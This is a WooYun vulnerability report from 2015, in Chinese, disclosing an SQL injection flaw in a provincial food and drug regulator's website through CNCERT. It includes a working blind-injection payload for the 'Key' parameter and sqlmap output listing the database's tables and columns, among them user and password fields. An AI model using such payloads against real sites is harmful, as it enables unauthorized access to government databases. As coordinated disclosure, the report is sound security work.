当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165905

漏洞标题:某省药品食品监督局存在sql注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 猪猪虾

提交时间:2015-12-31 01:58

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-31: 细节已通知厂商并且等待厂商处理中
2015-12-31: 厂商已经确认,细节仅向厂商公开
2016-01-10: 细节向核心白帽子及相关领域专家公开
2016-01-20: 细节向普通白帽子公开
2016-01-30: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

某省药品食品监督局存在sql注入漏洞

详细说明:

注入点 注入Key:

http://**.**.**.**/balist.cgi?page=23&Key=


Parameter: Key (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=23&Key=%' AND 7903=7903 AND '%'='
---
[21:09:22] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[13 tables]
+----------------+
| counter |
| department |
| dtproperties |
| guestbook |
| items |
| keywords |
| news |
| sessions |
| sysconstraints |
| syssegments |
| sysusers |
| usr |
| vote |
+----------------+
Database: Microsoft_Access_masterdb
Table: usr
[5 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| user | non-numeric |
| bid | non-numeric |
| c1 | non-numeric |
| password | non-numeric |
| username | non-numeric |
Database: Microsoft_Access_masterdb
Table: sysusers
[9 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| user | non-numeric |
| bid | non-numeric |
| c1 | non-numeric |
| gid | non-numeric |
| name | non-numeric |
| password | non-numeric |
| sid | non-numeric |
| status | non-numeric |
| uid | non-numeric |
+----------+-------------+
Database: Microsoft_Access_masterdb
Table: counter
[3 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| user | non-numeric |
| bid | non-numeric |
| c1 | non-numeric |
+--------+-------------+
Database: Microsoft_Access_masterdb
Table: department
[5 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| user | non-numeric |
| bid | non-numeric |
| c1 | non-numeric |
| deptid | non-numeric |
| deptname | non-numeric |
+----------+-------------+
Database: Microsoft_Access_masterdb
Table: keywords
[4 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| user | non-numeric |
| bid | non-numeric |
| c1 | non-numeric |
| keyword | non-numeric |
+---------+-------------+


13个表只列举几个座位安全检测

漏洞证明:

注入1.png


注入2.png


注入3.png

修复方案:

过滤

版权声明:转载请注明来源 猪猪虾@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-12-31 18:01

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给吉林分中心,由其后续协调网站管理单位处置。

最新状态:

暂无